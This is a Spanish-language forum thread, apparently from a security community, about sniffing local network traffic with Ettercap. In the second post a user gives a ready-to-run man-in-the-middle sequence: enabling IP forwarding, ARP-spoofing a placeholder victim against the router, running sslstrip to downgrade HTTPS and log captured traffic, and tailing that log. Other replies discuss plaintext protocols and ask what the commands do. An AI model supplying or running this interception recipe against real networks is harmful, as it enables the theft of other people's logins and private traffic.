Resultados 1 al 5 de 5

Tema: Ettercap a dia de hoy

  1. #1
    Recien Nacido
    Fecha de ingreso
    Jan 2012
    Mensajes
    8
    Gracias
    0
    Agradecido 0 veces en 0 Mensajes

    Predeterminado Ettercap a dia de hoy

    Hola buenas, estoy snifeando en red local y haciendo test training.

    Mi pregunta es: ¿ Cuando estoy snifeando con ettercap solo puedo obtener resultados cuando la pc-victima usa servidores "http" , en cambio cuando usa servidores "https" es imposible tener resultados...?

    Alguna opinion ?

    Gracias

  2. #2
    Recien Nacido
    Fecha de ingreso
    Jan 2012
    Mensajes
    8
    Gracias
    0
    Agradecido 0 veces en 0 Mensajes

    Predeterminado

    Bueno encontre la solución:

    Echo 1 > /proc/sys/net/ipv4/ip_forward

    arpspoof -i wlan0 -t [IP VICTIMA] [IP ROUTER]

    python sslstrip.py -w [nombre]

    tail -f [nombre]

    Saludos !! A dia de hoy funciona con sitios "https"

  3. #3
    Dragonauta con Privilegios
    Fecha de ingreso
    Feb 2010
    Mensajes
    212
    Gracias
    66
    Agradecido 38 veces en 23 Mensajes

    Predeterminado

    Hora rgcrally, a la hora de sniffar tienes que tener claro cuales son los protocolos vulnerables y que pasan datos en plaintext y cuales no. En el caso de HTTP, asi como FTP, TELNET entre otros, tienen este tipo de vuln. Ahora cuando trabajas con HTTPS o protocolo http basado en certificados, debes saber que es, para contrarestar estas medidas. Si los certificados no estan al dia, o realmente no estan instalados aunque la aplicacion corra HTTPS podras sniffarlo sin mas..o usar otra herramientas de tipo (sslstrip).

    Saludos,
    Última edición por Ksanchez; 08-21-2012 a las 10:42 AM

  4. #4
    Recien Nacido
    Fecha de ingreso
    Jul 2012
    Mensajes
    1
    Gracias
    0
    Agradecido 0 veces en 0 Mensajes

    Predeterminado

    Hola a todos, soy nuevo en el foro, lo estuve recorriendo y leyendo post y me resultan muy interesantes

    les comento que estoy empezando con esto de ettercap, y haciendo referencia a que solo puedo ver el contenido de http y al momento de hacer sniffing con https no logro que mande esa info,
    rgcrally, esas lineas que pusiste van en la terminal?, podrias comentar que hace cada una de ellas? gracias!
    una consulta mas, donde podria encontrar mas info de ettercap dentro del foro,

    saludos a todos

  5. #5
    Recien Nacido
    Fecha de ingreso
    Jun 2011
    Ubicación
    Colombia
    Mensajes
    37
    Gracias
    5
    Agradecido 0 veces en 0 Mensajes

    Predeterminado

    Seria bueno poder profundizar en el tema de los certificados....

Visitantes encuentran esta página buscando por:

ettercap no funciona https

enviar mensaje ettercap

cambiar certificado que usa ettercap

principiante ettercap

ettercapa como usar

ettercap

ver registros del ettercap

ettercap enviar mensajes con

como mandar mensajes en ettercap

manejo ettercap dragonjar

laboratorio ettercap

ettercap opinion

ettercap enviar mensaje al victima

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •